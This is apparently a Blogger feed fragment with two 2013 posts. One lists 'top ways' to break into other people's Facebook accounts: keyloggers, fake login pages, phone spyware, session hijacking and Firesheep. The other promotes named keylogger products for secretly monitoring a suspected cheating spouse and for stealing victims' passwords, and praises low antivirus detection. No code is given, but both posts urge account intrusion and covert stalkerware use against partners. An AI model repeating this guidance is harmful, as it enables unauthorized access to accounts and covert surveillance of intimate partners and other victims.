&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;2.&amp;nbsp;&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;Never trust any email hacking service that claims to hack any email for just&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;$100&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&amp;nbsp;or&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;$200&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;. Most of them are no more than a&lt;/span&gt;&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&amp;nbsp;scam.&lt;/b&gt;&lt;br /&gt;
&lt;br style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;With my experience of over&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;4 years&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&amp;nbsp;in the field of Hacking and Security i can say the following are the successful methods by which You can hack a&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;Facebook Account in 2013.&lt;/b&gt;&lt;br /&gt;
&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif; font-size: 15px;&quot;&gt;How To Hack Facebook Accounts In 2013 - Top 5 Ways-&lt;/b&gt;&lt;br /&gt;
&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;K&lt;/span&gt;eylogging&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;Difficulty - &amp;nbsp;Easy&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;Success Rate - 90 %&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; font-family: Arial, Tahoma, Verdana; font-size: 12px; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFgZpCYPyjMVPcFiRH0pEWpgsqjo40bsmQEwVs58uZ_JE-bVDd-tK-yc3ALqly1s26a79FbWEjo8G6kwpNeuQgs8Rj6SDkm4r_JRqBgUHuF4_l-mLNNEC9-irf26GXIyx32iYorHK5lp8/s1600/2_25_10%252520volusion%252520keyloggers.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; color: #a91b33; float: left; margin-bottom: 1em; margin-right: 1em; text-decoration: none;&quot; wrc_done=&quot;true&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;131&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFgZpCYPyjMVPcFiRH0pEWpgsqjo40bsmQEwVs58uZ_JE-bVDd-tK-yc3ALqly1s26a79FbWEjo8G6kwpNeuQgs8Rj6SDkm4r_JRqBgUHuF4_l-mLNNEC9-irf26GXIyx32iYorHK5lp8/s200/2_25_10%252520volusion%252520keyloggers.jpg&quot; style=&quot;border-width: 0px;&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&amp;nbsp;&lt;/div&gt;
&lt;span style=&quot;font-family: Arial, Tahoma, Verdana; font-size: medium;&quot;&gt;K&lt;/span&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;ey logging is one of the Easiest ways that you can use to Hack Face book Accounts. (Keylogging or keylogger) sometimes called a spying software is a small program which is used to monitor a local or a Remote PC, When a keylogger is installed on a victims computer it can monitor and capture each and every&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;keystroke typed&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&amp;nbsp;on the victims PC,the captured Keystrokes are sent to the Hacker.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;No doubt, these keystrokes contain the victim’s&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;Face book Account&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&amp;nbsp;Password and other such credential data thus key logger can be used for many purposes such as monitoring, Hacking and many more&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px; text-align: center;&quot;&gt;
&lt;b&gt;&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/10/what-are-keyloggers.html&quot; style=&quot;color: #a91b33; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;Learn More About Keyloggers&amp;nbsp;&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;
&lt;br style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot; /&gt;
&lt;br style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot; /&gt;
&lt;br style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot; /&gt;
&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;P&lt;/span&gt;hishing&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;Difficulty - Moderate&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;Success Rate - 70 %&lt;/span&gt;&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKKqlrdyOZrEeUUCFp_RKLI-3Wylaa3oul5RPi0HsAFZFbgenjt_47_uTkgbMypD1WcPRCmhzXDo5eMXciI71J2lFXgCOLFEqt_GbFbvp6xCLpJaEuF_GuxDzzQTf_WOK9cr51BJodip4/s200/facebook-phishing.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; color: #a91b33; float: left; font-family: Arial, Tahoma, Verdana; font-size: 12px; margin-bottom: 1em; margin-right: 1em; text-decoration: none;&quot; wrc_done=&quot;true&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKKqlrdyOZrEeUUCFp_RKLI-3Wylaa3oul5RPi0HsAFZFbgenjt_47_uTkgbMypD1WcPRCmhzXDo5eMXciI71J2lFXgCOLFEqt_GbFbvp6xCLpJaEuF_GuxDzzQTf_WOK9cr51BJodip4/s200/facebook-phishing.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px; text-align: justify;&quot;&gt;
&lt;b&gt;Phishing&lt;/b&gt;&amp;nbsp;is an attempt to criminally and fraudulently acquire sensitive information, such as user names, passwords and credit card details, by appearing as a trustworthy entity . There are many Ways by which a hacker can craft his Phisher (&lt;b&gt;Fake Page&lt;/b&gt;) to fool the victim. In a simple phishing attack a Hacker will create a phisher ( fake login page) which exactly looks like the real facebook page and then asks the victim to login into that page,&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px; text-align: justify;&quot;&gt;
Once the victim logins through the fake page the victims &quot;Email Address&quot; and &quot;Password&quot; is stored in a text file, The hacker then downloads the text file and get&#39;s his hands on the victims credentials. I have explained a step by step phishing process to Hack&amp;nbsp;Facebook&amp;nbsp;account &amp;nbsp;in the following Post&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/10/hack-facebook-password-using-phishing.html&quot; style=&quot;color: #a91b33; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: blue;&quot;&gt;Hack a Facebook Account Using a Fake login Page&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;M&lt;/span&gt;obile Phone Hacking&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;Difficulty - Easy&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;Success Rate - 90 %&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot; /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRnvkFnbU45alAImRNOpF41hZFEKYhMiTiHdtnF1nI9UjdRkfDnCntjAuwc12NavDDzdKvwUUn69z11jdK4_54XjiTtt5nMowisWtDQcIQum8yxfaHNIiq-eji3mCds174ZxAz__7Hft8/s1600/123.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; color: #a91b33; float: left; font-family: Arial, Tahoma, Verdana; font-size: 12px; margin-bottom: 1em; margin-right: 1em; text-decoration: none;&quot; wrc_done=&quot;true&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRnvkFnbU45alAImRNOpF41hZFEKYhMiTiHdtnF1nI9UjdRkfDnCntjAuwc12NavDDzdKvwUUn69z11jdK4_54XjiTtt5nMowisWtDQcIQum8yxfaHNIiq-eji3mCds174ZxAz__7Hft8/s1600/123.png&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;M&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;any users access Facebook from their smart Phones. If you have&amp;nbsp;access&amp;nbsp;to the victims Mobile phone, You can&amp;nbsp;easily&amp;nbsp;install a Cell phone&amp;nbsp;spying&amp;nbsp;software and thus you can easily hack , Monitor the victims Facebook Account .Today there are Many Cellphone Spying &amp;nbsp;software&#39;s, Some of the Best are listed below&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;1. Mspy&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;2. Spy Phone Gold&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot; /&gt;
&lt;br style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot; /&gt;
&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;S&lt;/span&gt;ession Hijacking&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;Difficulty - Moderate&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;Success Rate - 70 %&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px; text-align: justify;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;S&lt;/span&gt;&lt;/b&gt;ession Hijacking can be often very dangerous if you are accessing Facebook on a&lt;b&gt;&amp;nbsp;http://&lt;/b&gt;&amp;nbsp;connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access&amp;nbsp;&lt;b&gt;victims account&lt;/b&gt;, Session hijacking is widely used on Lan&#39;s. I will soon be writing a tutorial on how to hack facebook Account by session Hijacking&lt;/div&gt;
&lt;br style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot; /&gt;
&lt;br style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot; /&gt;
&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;S&lt;/span&gt;ide Jacking Using Fire Sheep&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;Difficulty - Moderate&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;Success Rate - 60 %&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot; /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTKYCCVCPWsVHn1MBUmWkPOfqtA_Jky2i5Qlr6fwO20kPF2bR6qLx_uw8ZL_9ovYsZGrVPdL4MRBQ_pau2v6KzLRJeP9Ur8A8Vq4TjJgC1tyXkJ9Av_tGqFeS3gFrSixrEU2tckIal64A/s1600/30_firesheepfireshepherd.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; color: #a91b33; float: left; font-family: Arial, Tahoma, Verdana; font-size: 12px; margin-bottom: 1em; margin-right: 1em; text-decoration: none;&quot; wrc_done=&quot;true&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTKYCCVCPWsVHn1MBUmWkPOfqtA_Jky2i5Qlr6fwO20kPF2bR6qLx_uw8ZL_9ovYsZGrVPdL4MRBQ_pau2v6KzLRJeP9Ur8A8Vq4TjJgC1tyXkJ9Av_tGqFeS3gFrSixrEU2tckIal64A/s1600/30_firesheepfireshepherd.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px; text-align: justify;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;F&lt;/span&gt;ire sheep&lt;/b&gt;&amp;nbsp;is widely used to carry out side jacking attacks, Fire sheep only works when the attacker and the victim is on the same wifi network or in LAN .Fire sheep is an extension developed by Eric Butler for the FireFox web browser. The extension uses a packet sniffer to intercept unencrypted cookies from certain websites (such as Facebook and Twitter) as the cookies are transmitted over networks, exploiting session hijacking vulnerabilities.&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px; text-align: justify;&quot;&gt;
It shows the discovered&amp;nbsp;&lt;b&gt;identities&lt;/b&gt;&amp;nbsp;on a sidebar displayed in the browser, and allows the user to instantly take on the log-in credentials of the user by double-clicking on the victim&#39;s name&lt;b&gt;.&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/4801128672973467144/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2013/10/top-5-ways-to-hack-facebook-account.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/4801128672973467144'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/4801128672973467144'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2013/10/top-5-ways-to-hack-facebook-account.html' title='Top 5 Ways to Hack Facebook Account'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwurW72qD69I10km9twjj9UKmBGBjT_ghsHhVxyE_IcVf-hjg64AC66ehYg8wtGRL59ZEl0j5fJdsszfcLwPeoim69I1B-OqmaBNEd9u0pkdAglSwaV1x4RmNLCtmhCkuRQetfjlBNv_g/s72-c/images+(1).jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-1710498877348303851</id><published>2013-10-24T23:11:00.000+05:30</published><updated>2013-10-24T23:11:03.053+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Ethical Hacking"/><title type='text'>What are Keyloggers?</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot; trbidi=&quot;on&quot;&gt;
&lt;div dir=&quot;ltr&quot; trbidi=&quot;on&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;A&lt;/b&gt;&lt;/span&gt;&amp;nbsp;keylogger sometimes called a spying software is a small program which is used to monitor a local or a Remote PC, Keyloggers now a days are so easy to use that a person with even a basic knowledge of computers can use keylogger.Once a keylogger is installed in your computer it can monitor each and every keystroke typed on your computer, thus&amp;nbsp;key logger&amp;nbsp;can be used for many&amp;nbsp;purposes&amp;nbsp;such as&amp;nbsp;monitoring&amp;nbsp;your&amp;nbsp;children&amp;nbsp;,&amp;nbsp;employees&amp;nbsp;and many more&lt;br /&gt;&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; padding: 4px; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFgZpCYPyjMVPcFiRH0pEWpgsqjo40bsmQEwVs58uZ_JE-bVDd-tK-yc3ALqly1s26a79FbWEjo8G6kwpNeuQgs8Rj6SDkm4r_JRqBgUHuF4_l-mLNNEC9-irf26GXIyx32iYorHK5lp8/s1600/2_25_10%252520volusion%252520keyloggers.jpg&quot; style=&quot;color: #a91b33; margin-left: auto; margin-right: auto; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; class=&quot;imagedropshadow&quot; height=&quot;211&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFgZpCYPyjMVPcFiRH0pEWpgsqjo40bsmQEwVs58uZ_JE-bVDd-tK-yc3ALqly1s26a79FbWEjo8G6kwpNeuQgs8Rj6SDkm4r_JRqBgUHuF4_l-mLNNEC9-irf26GXIyx32iYorHK5lp8/s320/2_25_10%252520volusion%252520keyloggers.jpg&quot; style=&quot;border: 1px solid rgb(239, 239, 239); padding: 5px;&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;font-size: 10px;&quot;&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style=&quot;font-family: inherit;&quot;&gt;
There are&amp;nbsp;&lt;b&gt;Two main types&amp;nbsp;&lt;/b&gt;of keyloggers that you should be aware of&lt;br /&gt;&lt;/div&gt;
&lt;a href=&quot;&quot; name=&quot;more&quot; style=&quot;color: #a91b33;&quot;&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style=&quot;font-family: inherit;&quot;&gt;
&lt;span style=&quot;color: #cc0000;&quot;&gt;&lt;b&gt;Hardware Keyloggers&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: inherit;&quot;&gt;
&lt;br /&gt;This type of keylogger is a piece of equipment that is physically attached to ones computer, typically between the keyboard and the machine itself. While this type is the most powerful and readily available (try a Google search for ‘keylogger’ and you’ll be shocked), it also requires direct access to a machine to be installed.&lt;/div&gt;
&lt;div style=&quot;font-family: inherit;&quot;&gt;
&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;&lt;b&gt;Software Keyloggers&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: inherit;&quot;&gt;
&lt;br /&gt;This is the form of keylogging that you should be most aware of. In this case, the keylogger is attached via&amp;nbsp;&lt;b&gt;&lt;a href=&quot;http://hackhaholic.blogspot.com/2011/06/introduction-to-malware.html&quot; style=&quot;color: #a91b33; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: blue;&quot;&gt;Malware&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;, typically through a trojan horse. Thus, you’ll download an unsuspicious file (the trojan horse) that contains the keylogging software (malware). Once installed, the controller has full access to all of your keystrokes and passwords.&lt;/div&gt;
&lt;div style=&quot;font-family: inherit;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;Why Do I need A keylogger ?&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;For Partners:&lt;/b&gt;&amp;nbsp;Do you Suspect that your Spouse is cheating on you AND you do not have hard evidence to prove it? Consider Installing SniperSpy, it not only gives you the Complete activity of your Spouse but also provides enough Screen shots and Chat history that can serve as the clear evidence against your Cheating Spouse&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;margin: 0px;&quot;&gt;
&lt;b&gt;For Hackers:&amp;nbsp;&lt;/b&gt;Are you looking for any easy way to hack into someones facebook or Myspace accounts ? or wanna control someones facebook account?&amp;nbsp;Key loggers&amp;nbsp; can expose you all the Keystrokes entered by your victim including Usernames and Passwords for any websites.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: inherit;&quot;&gt;
&lt;b&gt;For Parents:&lt;/b&gt;&amp;nbsp;Does your child spends most of their time before their computers? If your children spend time chatting or playing computer games, they can be approached by the strangers. In other words they are exposed to potentially Dangerous things like PORN, Gambling, Dating Strangers, etc. In this Case Keyloggers is the best solution to Monitor and control the Online Activity of your child.&lt;/div&gt;
&lt;div style=&quot;font-family: inherit;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;b style=&quot;font-family: inherit;&quot;&gt;For Employers:&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&amp;nbsp;Do all your employees use their computer resources and Internet connection solely for your business? Do they work as hard as you? OR Do you suspect your employee’s productivity is lacking? You should consider installing&amp;nbsp;&lt;/span&gt;Key logger&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&amp;nbsp;Software that can serve as the best Employee Monitoring Software for Small business.&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;font-family: inherit;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;Which Keylogger to choose ?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;There are&amp;nbsp;plenty&amp;nbsp;of&amp;nbsp;Key loggers&amp;nbsp;in the market some are free and some are costly ,&amp;nbsp;With my experience of more than 3 years in the field of &amp;nbsp;Hacking and security I suggest only two&amp;nbsp;key loggers&amp;nbsp;which I think are best and have a comparatively low antivirus detection rate ,&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1. Sniperspy&lt;/b&gt;&lt;br /&gt;&lt;b&gt;2&lt;/b&gt;. &lt;b&gt;Realtime spy&lt;/b&gt;&lt;a href=&quot;http://hackhaholic.blogspot.com/2011/06/hack-remote-computer-using-realtime-spy.html&quot; style=&quot;color: #a91b33; text-decoration: none;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: blue;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;If your looking &amp;nbsp;for some Free&amp;nbsp;key loggers&amp;nbsp;then i would suggest you to go with &lt;b&gt;Ardmax keylogger.&lt;/b&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: xx-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;Any doubt?? Drop a comment!&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/1710498877348303851/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2013/10/what-are-keyloggers.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/1710498877348303851'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/1710498877348303851'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2013/10/what-are-keyloggers.html' title='What are Keyloggers?'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><media:thumbnail 